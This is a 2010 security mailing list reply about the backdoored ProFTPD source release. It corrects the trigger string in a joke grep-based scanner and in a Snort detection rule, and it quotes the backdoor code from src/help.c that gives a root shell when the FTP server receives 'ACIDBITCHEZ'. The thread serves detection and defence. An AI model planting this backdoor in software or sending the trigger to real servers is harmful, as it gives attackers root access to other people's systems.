Hi, You might want to make the below patch: ======== @@ -9,7 +9,7 @@ # online store. # # 50% of all proceeds will go to the victims that have been -# owned by ACIDBITCHES within the past 6 years. +# owned by ACIDBITCHEZ within the past 6 years. # ###################################################################
@@ -17,4 +17,4 @@ export PATH=/bin -grep -r ACIDBITCHES * +grep -r ACIDBITCHEZ * ==== The snort rule you link to is checking for "HELP ACIDBITCHES", I believe incorrectly, as the compromised code actually appears to trigger on the string "ACIDBITCHEZ". Snort sig (...BITCHES, http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965) "" alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHES)"; flow:established,to_server; content:"HELP ACIDBITCHES"; depth:16; nocase; classtype: trojan-activity; "" The compromise (...BITCHEZ, http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/, http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in src/help.c: "" } else if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); } /* List the syntax for the given target command. */ "" Thanks! On Thu, Dec 2, 2010 at 10:18 AM, <[email protected]> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Esteemed members of the Full Disclosure mailing list, > > In the wake of the recent compromise of the ProFTPd distribution > server and the subsequent root-level backdoor that was placed into > the source[0], we are proud to announce a cutting edge source code > scanner that will help you detect backdoors in your code. This code > is free to use for 30 days, after which time you must pay for it. > > > - ------------- el8 Vuln Scan v.0.1 ------------- > > #!/bin/bash > > ################################################################### > # > # Place this script inside the top level directory of your > # source code repo. > # > # Please delete this after 30 days, or purchase a copy from our > # online store. > # > # 50% of all proceeds will go to the victims that have been > # owned by ACIDBITCHES within the past 6 years. > # > ################################################################### > > # main > > export PATH=/bin > > grep -r ACIDBITCHES * > > - ------------- el8 Vuln Scan v.0.1 ------------- > > > Thank you for helping us to help you make the Internet a safer > place. > > > [0] > http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging- > sigs/7965 > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL > Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw > yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h > 7KFZMWU= > =mJJI > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
